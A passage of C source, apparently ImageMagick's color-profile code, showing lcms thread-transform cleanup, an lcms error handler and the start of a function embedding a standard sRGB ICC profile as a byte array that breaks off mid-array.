if (transform[i] == (cmsHTRANSFORM) NULL)
return(DestroyTransformThreadSet(transform));
}
return(transform);
}
#endif
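/*
  The helpers above allocate one pixel buffer and one cmsHTRANSFORM per
  worker thread (GetMagickResourceLimit(ThreadResource) slots); the OpenMP
  loop in ProfileImage() indexes both sets with GetOpenMPThreadId(), so no
  lcms transform state is shared between threads.
*/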
#if defined(MAGICKCORE_LCMS_DELEGATE)
static void LCMSExceptionHandler(cmsContext context,cmsUInt32Number severity,
const char *message)
{
Image
*image;
(void) LogMagickEvent(TransformEvent,GetMagickModule(),"lcms: #%u, %s",
severity,message != (char *) NULL ? message : "no message");
image=(Image *) context;
if (image != (Image *) NULL)
(void) ThrowMagickException(&image->exception,GetMagickModule(),
ImageWarning,"UnableToTransformColorspace","`%s'",image->filename);
}
#endif
static MagickBooleanType SetsRGBImageProfile(Image *image)
{
static unsigned char
sRGBProfile[] =
{
0x00, 0x00, 0x0c, 0x8c, 0x61, 0x72, 0x67, 0x6c, 0x02, 0x20, 0x00, 0x00,
0x6d, 0x6e, 0x74, 0x72, 0x52, 0x47, 0x42, 0x20, 0x58, 0x59, 0x5a, 0x20,
0x07, 0xde, 0x00, 0x01, 0x00, 0x06, 0x00, 0x16, 0x00, 0x0f, 0x00, 0x3a,
0x61, 0x63, 0x73, 0x70, 0x4d, 0x53, 0x46, 0x54, 0x00, 0x00, 0x00, 0x00,
0x49, 0x45, 0x43, 0x20, 0x73, 0x52, 0x47, 0x42, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf6, 0xd6,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0xd3, 0x2d, 0x61, 0x72, 0x67, 0x6c,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x01, 0x50, 0x00, 0x00, 0x00, 0x99,
0x63, 0x70, 0x72, 0x74, 0x00, 0x00, 0x01, 0xec, 0x00, 0x00, 0x00, 0x67,
0x64, 0x6d, 0x6e, 0x64, 0x00, 0x00, 0x02, 0x54, 0x00, 0x00, 0x00, 0x70,
0x64, 0x6d, 0x64, 0x64, 0x00, 0x00, 0x02, 0xc4, 0x00, 0x00, 0x00, 0x88,
0x74, 0x65, 0x63, 0x68, 0x00, 0x00, 0x03, 0x4c, 0x00, 0x00, 0x00, 0x0c,
0x76, 0x75, 0x65, 0x64, 0x00, 0x00, 0x03, 0x58, 0x00, 0x00, 0x00, 0x67,
0x76, 0x69, 0x65, 0x77, 0x00, 0x00, 0x03, 0xc0, 0x00, 0x00, 0x00, 0x24,
0x6c, 0x75, 0x6d, 0x69, 0x00, 0x00, 0x03, 0xe4, 0x00, 0x00, 0x00, 0x14,
0x6d, 0x65, 0x61, 0x73, 0x00, 0x00, 0x03, 0xf8, 0x00, 0x00, 0x00, 0x24,
0x77, 0x74, 0x70, 0x74, 0x00, 0x00, 0x04, 0x1c, 0x00, 0x00, 0x00, 0x14,
0x62, 0x6b, 0x70, 0x74, 0x00, 0x00, 0x04, 0x30, 0x00, 0x00, 0x00, 0x14,
0x72, 0x58, 0x59, 0x5a, 0x00, 0x00, 0x04, 0x44, 0x00, 0x00, 0x00, 0x14,
0x67, 0x58, 0x59, 0x5a, 0x00, 0x00, 0x04, 0x58, 0x00, 0x00, 0x00, 0x14,
0x62, 0x58, 0x59, 0x5a, 0x00, 0x00, 0x04, 0x6c, 0x00, 0x00, 0x00, 0x14,
0x72, 0x54, 0x52, 0x43, 0x00, 0x00, 0x04, 0x80, 0x00, 0x00, 0x08, 0x0c,
0x67, 0x54, 0x52, 0x43, 0x00, 0x00, 0x04, 0x80, 0x00, 0x00, 0x08, 0x0c,
0x62, 0x54, 0x52, 0x43, 0x00, 0x00, 0x04, 0x80, 0x00, 0x00, 0x08, 0x0c,
0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3f,
0x73, 0x52, 0x47, 0x42, 0x20, 0x49, 0x45, 0x43, 0x36, 0x31, 0x39, 0x36,
0x36, 0x2d, 0x32, 0x2e, 0x31, 0x20, 0x28, 0x45, 0x71, 0x75, 0x69, 0x76,
0x61, 0x6c, 0x65, 0x6e, 0x74, 0x20, 0x74, 0x6f, 0x20, 0x77, 0x77, 0x77,
0x2e, 0x73, 0x72, 0x67, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x20, 0x31, 0x39,
0x39, 0x38, 0x20, 0x48, 0x50, 0x20, 0x70, 0x72, 0x6f, 0x66, 0x69, 0x6c,
0x65, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x3f, 0x73, 0x52, 0x47, 0x42, 0x20, 0x49, 0x45, 0x43, 0x36, 0x31,
0x39, 0x36, 0x36, 0x2d, 0x32, 0x2e, 0x31, 0x20, 0x28, 0x45, 0x71, 0x75,
0x69, 0x76, 0x61, 0x6c, 0x65, 0x6e, 0x74, 0x20, 0x74, 0x6f, 0x20, 0x77,
0x77, 0x77, 0x2e, 0x73, 0x72, 0x67, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x20,
0x31, 0x39, 0x39, 0x38, 0x20, 0x48, 0x50, 0x20, 0x70, 0x72, 0x6f, 0x66,
0x69, 0x6c, 0x65, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 0x00, 0x43, 0x72, 0x65, 0x61,
0x74, 0x65, 0x64, 0x20, 0x62, 0x79, 0x20, 0x47, 0x72, 0x61, 0x65, 0x6d,
0x65, 0x20, 0x57, 0x2e, 0x20, 0x47, 0x69, 0x6c, 0x6c, 0x2e, 0x20, 0x52,
0x65, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x64, 0x20, 0x69, 0x6e, 0x74, 0x6f,
0x20, 0x74, 0x68, 0x65, 0x20, 0x70, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x20,
0x64, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x2e, 0x20, 0x4e, 0x6f, 0x20, 0x57,
0x61, 0x72, 0x72, 0x61, 0x6e, 0x74, 0x79, 0x2c, 0x20, 0x55, 0x73, 0x65,
0x20, 0x61, 0x74, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x6f, 0x77, 0x6e,
0x20, 0x72, 0x69, 0x73, 0x6b, 0x2e, 0x00, 0x00, 0x64, 0x65, 0x73, 0x63,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x49, 0x45, 0x43, 0x20,
0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x77, 0x77, 0x77, 0x2e, 0x69,
0x65, 0x63, 0x2e, 0x63, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x16, 0x49, 0x45, 0x43, 0x20, 0x68, 0x74, 0x74,
0x70, 0x3a, 0x2f, 0x2f, 0x77, 0x77, 0x77, 0x2e, 0x69, 0x65, 0x63, 0x2e,
0x63, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2e,
0x49, 0x45, 0x43, 0x20, 0x36, 0x31, 0x39, 0x36, 0x36, 0x2d, 0x32, 0x2e,
0x31, 0x20, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x20, 0x52, 0x47,
0x42, 0x20, 0x63, 0x6f, 0x6c, 0x6f, 0x75, 0x72, 0x20, 0x73, 0x70, 0x61,
0x63, 0x65, 0x20, 0x2d, 0x20, 0x73, 0x52, 0x47, 0x42, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2e, 0x49, 0x45, 0x43,
0x20, 0x36, 0x31, 0x39, 0x36, 0x36, 0x2d, 0x32, 0x2e, 0x31, 0x20, 0x44,
0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x20, 0x52, 0x47, 0x42, 0x20, 0x63,
0x6f, 0x6c, 0x6f, 0x75, 0x72, 0x20, 0x73, 0x70, 0x61, 0x63, 0x65, 0x20,
0x2d, 0x20, 0x73, 0x52, 0x47, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x73, 0x69, 0x67, 0x20, 0x00, 0x00, 0x00, 0x00,
0x43, 0x52, 0x54, 0x20, 0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x0d, 0x49, 0x45, 0x43, 0x36, 0x31, 0x39, 0x36, 0x36,
0x2d, 0x32, 0x2e, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x0d, 0x49, 0x45, 0x43, 0x36, 0x31, 0x39, 0x36, 0x36,
0x2d, 0x32, 0x2e, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x76, 0x69, 0x65, 0x77, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0xa4, 0x7c,
0x00, 0x14, 0x5f, 0x30, 0x00, 0x10, 0xce, 0x02, 0x00, 0x03, 0xed, 0xb2,
0x00, 0x04, 0x13, 0x0a, 0x00, 0x03, 0x5c, 0x67, 0x00, 0x00, 0x00, 0x01,
0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x0a, 0x3d,
0x00, 0x50, 0x00, 0x00, 0x00, 0x57, 0x1e, 0xb8, 0x6d, 0x65, 0x61, 0x73,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x02, 0x8f, 0x00, 0x00, 0x00, 0x02, 0x58, 0x59, 0x5a, 0x20,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf3, 0x51, 0x00, 0x01, 0x00, 0x00,
0x00, 0x01, 0x16, 0xcc, 0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6f, 0xa0,
0x00, 0x00, 0x38, 0xf5, 0x00, 0x00, 0x03, 0x90, 0x58, 0x59, 0x5a, 0x20,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x97, 0x00, 0x00, 0xb7, 0x87,
0x00, 0x00, 0x18, 0xd9, 0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x24, 0x9f, 0x00, 0x00, 0x0f, 0x84, 0x00, 0x00, 0xb6, 0xc4,
0x63, 0x75, 0x72, 0x76, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
0x00, 0x00, 0x00, 0x05, 0x00, 0x0a, 0x00, 0x0f, 0x00, 0x14, 0x00, 0x19,
0x00, 0x1e, 0x00, 0x23, 0x00, 0x28, 0x00, 0x2d, 0x00, 0x32, 0x00, 0x37,
0x00, 0x3b, 0x00, 0x40, 0x00, 0x45, 0x00, 0x4a, 0x00, 0x4f, 0x00, 0x54,
0x00, 0x59, 0x00, 0x5e, 0x00, 0x63, 0x00, 0x68, 0x00, 0x6d, 0x00, 0x72,
0x00, 0x77, 0x00, 0x7c, 0x00, 0x81, 0x00, 0x86, 0x00, 0x8b, 0x00, 0x90,
0x00, 0x95, 0x00, 0x9a, 0x00, 0x9f, 0x00, 0xa4, 0x00, 0xa9, 0x00, 0xae,
0x00, 0xb2, 0x00, 0xb7, 0x00, 0xbc, 0x00, 0xc1, 0x00, 0xc6, 0x00, 0xcb,
0x00, 0xd0, 0x00, 0xd5, 0x00, 0xdb, 0x00, 0xe0, 0x00, 0xe5, 0x00, 0xeb,
0x00, 0xf0, 0x00, 0xf6, 0x00, 0xfb, 0x01, 0x01, 0x01, 0x07, 0x01, 0x0d,
0x01, 0x13, 0x01, 0x19, 0x01, 0x1f, 0x01, 0x25, 0x01, 0x2b, 0x01, 0x32,
0x01, 0x38, 0x01, 0x3e, 0x01, 0x45, 0x01, 0x4c, 0x01, 0x52, 0x01, 0x59,
0x01, 0x60, 0x01, 0x67, 0x01, 0x6e, 0x01, 0x75, 0x01, 0x7c, 0x01, 0x83,
0x01, 0x8b, 0x01, 0x92, 0x01, 0x9a, 0x01, 0xa1, 0x01, 0xa9, 0x01, 0xb1,
0x01, 0xb9, 0x01, 0xc1, 0x01, 0xc9, 0x01, 0xd1, 0x01, 0xd9, 0x01, 0xe1,
0x01, 0xe9, 0x01, 0xf2, 0x01, 0xfa, 0x02, 0x03, 0x02, 0x0c, 0x02, 0x14,
0x02, 0x1d, 0x02, 0x26, 0x02, 0x2f, 0x02, 0x38, 0x02, 0x41, 0x02, 0x4b,
0x02, 0x54, 0x02, 0x5d, 0x02, 0x67, 0x02, 0x71, 0x02, 0x7a, 0x02, 0x84,
0x02, 0x8e, 0x02, 0x98, 0x02, 0xa2, 0x02, 0xac, 0x02, 0xb6, 0x02, 0xc1,
0x02, 0xcb, 0x02, 0xd5, 0x02, 0xe0, 0x02, 0xeb, 0x02, 0xf5, 0x03, 0x00,
0x03, 0x0b, 0x03, 0x16, 0x03, 0x21, 0x03, 0x2d, 0x03, 0x38, 0x03, 0x43,
0x03, 0x4f, 0x03, 0x5a, 0x03, 0x66, 0x03, 0x72, 0x03, 0x7e, 0x03, 0x8a,
0x03, 0x96, 0x03, 0xa2, 0x03, 0xae, 0x03, 0xba, 0x03, 0xc7, 0x03, 0xd3,
0x03, 0xe0, 0x03, 0xec, 0x03, 0xf9, 0x04, 0x06, 0x04, 0x13, 0x04, 0x20,
0x04, 0x2d, 0x04, 0x3b, 0x04, 0x48, 0x04, 0x55, 0x04, 0x63, 0x04, 0x71,
0x04, 0x7e, 0x04, 0x8c, 0x04, 0x9a, 0x04, 0xa8, 0x04, 0xb6, 0x04, 0xc4,
0x04, 0xd3, 0x04, 0xe1, 0x04, 0xf0, 0x04, 0xfe, 0x05, 0x0d, 0x05, 0x1c,
0x05, 0x2b, 0x05, 0x3a, 0x05, 0x49, 0x05, 0x58, 0x05, 0x67, 0x05, 0x77,
0x05, 0x86, 0x05, 0x96, 0x05, 0xa6, 0x05, 0xb5, 0x05, 0xc5, 0x05, 0xd5,
0x05, 0xe5, 0x05, 0xf6, 0x06, 0x06, 0x06, 0x16, 0x06, 0x27, 0x06, 0x37,
0x06, 0x48, 0x06, 0x59, 0x06, 0x6a, 0x06, 0x7b, 0x06, 0x8c, 0x06, 0x9d,
0x06, 0xaf, 0x06, 0xc0, 0x06, 0xd1, 0x06, 0xe3, 0x06, 0xf5, 0x07, 0x07,
0x07, 0x19, 0x07, 0x2b, 0x07, 0x3d, 0x07, 0x4f, 0x07, 0x61, 0x07, 0x74,
0x07, 0x86, 0x07, 0x99, 0x07, 0xac, 0x07, 0xbf, 0x07, 0xd2, 0x07, 0xe5,
0x07, 0xf8, 0x08, 0x0b, 0x08, 0x1f, 0x08, 0x32, 0x08, 0x46, 0x08, 0x5a,
0x08, 0x6e, 0x08, 0x82, 0x08, 0x96, 0x08, 0xaa, 0x08, 0xbe, 0x08, 0xd2,
0x08, 0xe7, 0x08, 0xfb, 0x09, 0x10, 0x09, 0x25, 0x09, 0x3a, 0x09, 0x4f,
0x09, 0x64, 0x09, 0x79, 0x09, 0x8f, 0x09, 0xa4, 0x09, 0xba, 0x09, 0xcf,
0x09, 0xe5, 0x09, 0xfb, 0x0a, 0x11, 0x0a, 0x27, 0x0a, 0x3d, 0x0a, 0x54,
0x0a, 0x6a, 0x0a, 0x81, 0x0a, 0x98, 0x0a, 0xae, 0x0a, 0xc5, 0x0a, 0xdc,
0x0a, 0xf3, 0x0b, 0x0b, 0x0b, 0x22, 0x0b, 0x39, 0x0b, 0x51, 0x0b, 0x69,
0x0b, 0x80, 0x0b, 0x98, 0x0b, 0xb0, 0x0b, 0xc8, 0x0b, 0xe1, 0x0b, 0xf9,
0x0c, 0x12, 0x0c, 0x2a, 0x0c, 0x43, 0x0c, 0x5c, 0x0c, 0x75, 0x0c, 0x8e,
0x0c, 0xa7, 0x0c, 0xc0, 0x0c, 0xd9, 0x0c, 0xf3, 0x0d, 0x0d, 0x0d, 0x26,
0x0d, 0x40, 0x0d, 0x5a, 0x0d, 0x74, 0x0d, 0x8e, 0x0d, 0xa9, 0x0d, 0xc3,
0x0d, 0xde, 0x0d, 0xf8, 0x0e, 0x13, 0x0e, 0x2e, 0x0e, 0x49, 0x0e, 0x64,
0x0e, 0x7f, 0x0e, 0x9b, 0x0e, 0xb6, 0x0e, 0xd2, 0x0e, 0xee, 0x0f, 0x09,
0x0f, 0x25, 0x0f, 0x41, 0x0f, 0x5e, 0x0f, 0x7a, 0x0f, 0x96, 0x0f, 0xb3,
0x0f, 0xcf, 0x0f, 0xec, 0x10, 0x09, 0x10, 0x26, 0x10, 0x43, 0x10, 0x61,
0x10, 0x7e, 0x10, 0x9b, 0x10, 0xb9, 0x10, 0xd7, 0x10, 0xf5, 0x11, 0x13,
0x11, 0x31, 0x11, 0x4f, 0x11, 0x6d, 0x11, 0x8c, 0x11, 0xaa, 0x11, 0xc9,
0x11, 0xe8, 0x12, 0x07, 0x12, 0x26, 0x12, 0x45, 0x12, 0x64, 0x12, 0x84,
0x12, 0xa3, 0x12, 0xc3, 0x12, 0xe3, 0x13, 0x03, 0x13, 0x23, 0x13, 0x43,
0x13, 0x63, 0x13, 0x83, 0x13, 0xa4, 0x13, 0xc5, 0x13, 0xe5, 0x14, 0x06,
0x14, 0x27, 0x14, 0x49, 0x14, 0x6a, 0x14, 0x8b, 0x14, 0xad, 0x14, 0xce,
0x14, 0xf0, 0x15, 0x12, 0x15, 0x34, 0x15, 0x56, 0x15, 0x78, 0x15, 0x9b,
0x15, 0xbd, 0x15, 0xe0, 0x16, 0x03, 0x16, 0x26, 0x16, 0x49, 0x16, 0x6c,
0x16, 0x8f, 0x16, 0xb2, 0x16, 0xd6, 0x16, 0xfa, 0x17, 0x1d, 0x17, 0x41,
0x17, 0x65, 0x17, 0x89, 0x17, 0xae, 0x17, 0xd2, 0x17, 0xf7, 0x18, 0x1b,
0x18, 0x40, 0x18, 0x65, 0x18, 0x8a, 0x18, 0xaf, 0x18, 0xd5, 0x18, 0xfa,
0x19, 0x20, 0x19, 0x45, 0x19, 0x6b, 0x19, 0x91, 0x19, 0xb7, 0x19, 0xdd,
0x1a, 0x04, 0x1a, 0x2a, 0x1a, 0x51, 0x1a, 0x77, 0x1a, 0x9e, 0x1a, 0xc5,
0x1a, 0xec, 0x1b, 0x14, 0x1b, 0x3b, 0x1b, 0x63, 0x1b, 0x8a, 0x1b, 0xb2,
0x1b, 0xda, 0x1c, 0x02, 0x1c, 0x2a, 0x1c, 0x52, 0x1c, 0x7b, 0x1c, 0xa3,
0x1c, 0xcc, 0x1c, 0xf5, 0x1d, 0x1e, 0x1d, 0x47, 0x1d, 0x70, 0x1d, 0x99,
0x1d, 0xc3, 0x1d, 0xec, 0x1e, 0x16, 0x1e, 0x40, 0x1e, 0x6a, 0x1e, 0x94,
0x1e, 0xbe, 0x1e, 0xe9, 0x1f, 0x13, 0x1f, 0x3e, 0x1f, 0x69, 0x1f, 0x94,
0x1f, 0xbf, 0x1f, 0xea, 0x20, 0x15, 0x20, 0x41, 0x20, 0x6c, 0x20, 0x98,
0x20, 0xc4, 0x20, 0xf0, 0x21, 0x1c, 0x21, 0x48, 0x21, 0x75, 0x21, 0xa1,
0x21, 0xce, 0x21, 0xfb, 0x22, 0x27, 0x22, 0x55, 0x22, 0x82, 0x22, 0xaf,
0x22, 0xdd, 0x23, 0x0a, 0x23, 0x38, 0x23, 0x66, 0x23, 0x94, 0x23, 0xc2,
0x23, 0xf0, 0x24, 0x1f, 0x24, 0x4d, 0x24, 0x7c, 0x24, 0xab, 0x24, 0xda,
0x25, 0x09, 0x25, 0x38, 0x25, 0x68, 0x25, 0x97, 0x25, 0xc7, 0x25, 0xf7,
0x26, 0x27, 0x26, 0x57, 0x26, 0x87, 0x26, 0xb7, 0x26, 0xe8, 0x27, 0x18,
0x27, 0x49, 0x27, 0x7a, 0x27, 0xab, 0x27, 0xdc, 0x28, 0x0d, 0x28, 0x3f,
0x28, 0x71, 0x28, 0xa2, 0x28, 0xd4, 0x29, 0x06, 0x29, 0x38, 0x29, 0x6b,
0x29, 0x9d, 0x29, 0xd0, 0x2a, 0x02, 0x2a, 0x35, 0x2a, 0x68, 0x2a, 0x9b,
0x2a, 0xcf, 0x2b, 0x02, 0x2b, 0x36, 0x2b, 0x69, 0x2b, 0x9d, 0x2b, 0xd1,
0x2c, 0x05, 0x2c, 0x39, 0x2c, 0x6e, 0x2c, 0xa2, 0x2c, 0xd7, 0x2d, 0x0c,
0x2d, 0x41, 0x2d, 0x76, 0x2d, 0xab, 0x2d, 0xe1, 0x2e, 0x16, 0x2e, 0x4c,
0x2e, 0x82, 0x2e, 0xb7, 0x2e, 0xee, 0x2f, 0x24, 0x2f, 0x5a, 0x2f, 0x91,
0x2f, 0xc7, 0x2f, 0xfe, 0x30, 0x35, 0x30, 0x6c, 0x30, 0xa4, 0x30, 0xdb,
0x31, 0x12, 0x31, 0x4a, 0x31, 0x82, 0x31, 0xba, 0x31, 0xf2, 0x32, 0x2a,
0x32, 0x63, 0x32, 0x9b, 0x32, 0xd4, 0x33, 0x0d, 0x33, 0x46, 0x33, 0x7f,
0x33, 0xb8, 0x33, 0xf1, 0x34, 0x2b, 0x34, 0x65, 0x34, 0x9e, 0x34, 0xd8,
0x35, 0x13, 0x35, 0x4d, 0x35, 0x87, 0x35, 0xc2, 0x35, 0xfd, 0x36, 0x37,
0x36, 0x72, 0x36, 0xae, 0x36, 0xe9, 0x37, 0x24, 0x37, 0x60, 0x37, 0x9c,
0x37, 0xd7, 0x38, 0x14, 0x38, 0x50, 0x38, 0x8c, 0x38, 0xc8, 0x39, 0x05,
0x39, 0x42, 0x39, 0x7f, 0x39, 0xbc, 0x39, 0xf9, 0x3a, 0x36, 0x3a, 0x74,
0x3a, 0xb2, 0x3a, 0xef, 0x3b, 0x2d, 0x3b, 0x6b, 0x3b, 0xaa, 0x3b, 0xe8,
0x3c, 0x27, 0x3c, 0x65, 0x3c, 0xa4, 0x3c, 0xe3, 0x3d, 0x22, 0x3d, 0x61,
0x3d, 0xa1, 0x3d, 0xe0, 0x3e, 0x20, 0x3e, 0x60, 0x3e, 0xa0, 0x3e, 0xe0,
0x3f, 0x21, 0x3f, 0x61, 0x3f, 0xa2, 0x3f, 0xe2, 0x40, 0x23, 0x40, 0x64,
0x40, 0xa6, 0x40, 0xe7, 0x41, 0x29, 0x41, 0x6a, 0x41, 0xac, 0x41, 0xee,
0x42, 0x30, 0x42, 0x72, 0x42, 0xb5, 0x42, 0xf7, 0x43, 0x3a, 0x43, 0x7d,
0x43, 0xc0, 0x44, 0x03, 0x44, 0x47, 0x44, 0x8a, 0x44, 0xce, 0x45, 0x12,
0x45, 0x55, 0x45, 0x9a, 0x45, 0xde, 0x46, 0x22, 0x46, 0x67, 0x46, 0xab,
0x46, 0xf0, 0x47, 0x35, 0x47, 0x7b, 0x47, 0xc0, 0x48, 0x05, 0x48, 0x4b,
0x48, 0x91, 0x48, 0xd7, 0x49, 0x1d, 0x49, 0x63, 0x49, 0xa9, 0x49, 0xf0,
0x4a, 0x37, 0x4a, 0x7d, 0x4a, 0xc4, 0x4b, 0x0c, 0x4b, 0x53, 0x4b, 0x9a,
0x4b, 0xe2, 0x4c, 0x2a, 0x4c, 0x72, 0x4c, 0xba, 0x4d, 0x02, 0x4d, 0x4a,
0x4d, 0x93, 0x4d, 0xdc, 0x4e, 0x25, 0x4e, 0x6e, 0x4e, 0xb7, 0x4f, 0x00,
0x4f, 0x49, 0x4f, 0x93, 0x4f, 0xdd, 0x50, 0x27, 0x50, 0x71, 0x50, 0xbb,
0x51, 0x06, 0x51, 0x50, 0x51, 0x9b, 0x51, 0xe6, 0x52, 0x31, 0x52, 0x7c,
0x52, 0xc7, 0x53, 0x13, 0x53, 0x5f, 0x53, 0xaa, 0x53, 0xf6, 0x54, 0x42,
0x54, 0x8f, 0x54, 0xdb, 0x55, 0x28, 0x55, 0x75, 0x55, 0xc2, 0x56, 0x0f,
0x56, 0x5c, 0x56, 0xa9, 0x56, 0xf7, 0x57, 0x44, 0x57, 0x92, 0x57, 0xe0,
0x58, 0x2f, 0x58, 0x7d, 0x58, 0xcb, 0x59, 0x1a, 0x59, 0x69, 0x59, 0xb8,
0x5a, 0x07, 0x5a, 0x56, 0x5a, 0xa6, 0x5a, 0xf5, 0x5b, 0x45, 0x5b, 0x95,
0x5b, 0xe5, 0x5c, 0x35, 0x5c, 0x86, 0x5c, 0xd6, 0x5d, 0x27, 0x5d, 0x78,
0x5d, 0xc9, 0x5e, 0x1a, 0x5e, 0x6c, 0x5e, 0xbd, 0x5f, 0x0f, 0x5f, 0x61,
0x5f, 0xb3, 0x60, 0x05, 0x60, 0x57, 0x60, 0xaa, 0x60, 0xfc, 0x61, 0x4f,
0x61, 0xa2, 0x61, 0xf5, 0x62, 0x49, 0x62, 0x9c, 0x62, 0xf0, 0x63, 0x43,
0x63, 0x97, 0x63, 0xeb, 0x64, 0x40, 0x64, 0x94, 0x64, 0xe9, 0x65, 0x3d,
0x65, 0x92, 0x65, 0xe7, 0x66, 0x3d, 0x66, 0x92, 0x66, 0xe8, 0x67, 0x3d,
0x67, 0x93, 0x67, 0xe9, 0x68, 0x3f, 0x68, 0x96, 0x68, 0xec, 0x69, 0x43,
0x69, 0x9a, 0x69, 0xf1, 0x6a, 0x48, 0x6a, 0x9f, 0x6a, 0xf7, 0x6b, 0x4f,
0x6b, 0xa7, 0x6b, 0xff, 0x6c, 0x57, 0x6c, 0xaf, 0x6d, 0x08, 0x6d, 0x60,
0x6d, 0xb9, 0x6e, 0x12, 0x6e, 0x6b, 0x6e, 0xc4, 0x6f, 0x1e, 0x6f, 0x78,
0x6f, 0xd1, 0x70, 0x2b, 0x70, 0x86, 0x70, 0xe0, 0x71, 0x3a, 0x71, 0x95,
0x71, 0xf0, 0x72, 0x4b, 0x72, 0xa6, 0x73, 0x01, 0x73, 0x5d, 0x73, 0xb8,
0x74, 0x14, 0x74, 0x70, 0x74, 0xcc, 0x75, 0x28, 0x75, 0x85, 0x75, 0xe1,
0x76, 0x3e, 0x76, 0x9b, 0x76, 0xf8, 0x77, 0x56, 0x77, 0xb3, 0x78, 0x11,
0x78, 0x6e, 0x78, 0xcc, 0x79, 0x2a, 0x79, 0x89, 0x79, 0xe7, 0x7a, 0x46,
0x7a, 0xa5, 0x7b, 0x04, 0x7b, 0x63, 0x7b, 0xc2, 0x7c, 0x21, 0x7c, 0x81,
0x7c, 0xe1, 0x7d, 0x41, 0x7d, 0xa1, 0x7e, 0x01, 0x7e, 0x62, 0x7e, 0xc2,
0x7f, 0x23, 0x7f, 0x84, 0x7f, 0xe5, 0x80, 0x47, 0x80, 0xa8, 0x81, 0x0a,
0x81, 0x6b, 0x81, 0xcd, 0x82, 0x30, 0x82, 0x92, 0x82, 0xf4, 0x83, 0x57,
0x83, 0xba, 0x84, 0x1d, 0x84, 0x80, 0x84, 0xe3, 0x85, 0x47, 0x85, 0xab,
0x86, 0x0e, 0x86, 0x72, 0x86, 0xd7, 0x87, 0x3b, 0x87, 0x9f, 0x88, 0x04,
0x88, 0x69, 0x88, 0xce, 0x89, 0x33, 0x89, 0x99, 0x89, 0xfe, 0x8a, 0x64,
0x8a, 0xca, 0x8b, 0x30, 0x8b, 0x96, 0x8b, 0xfc, 0x8c, 0x63, 0x8c, 0xca,
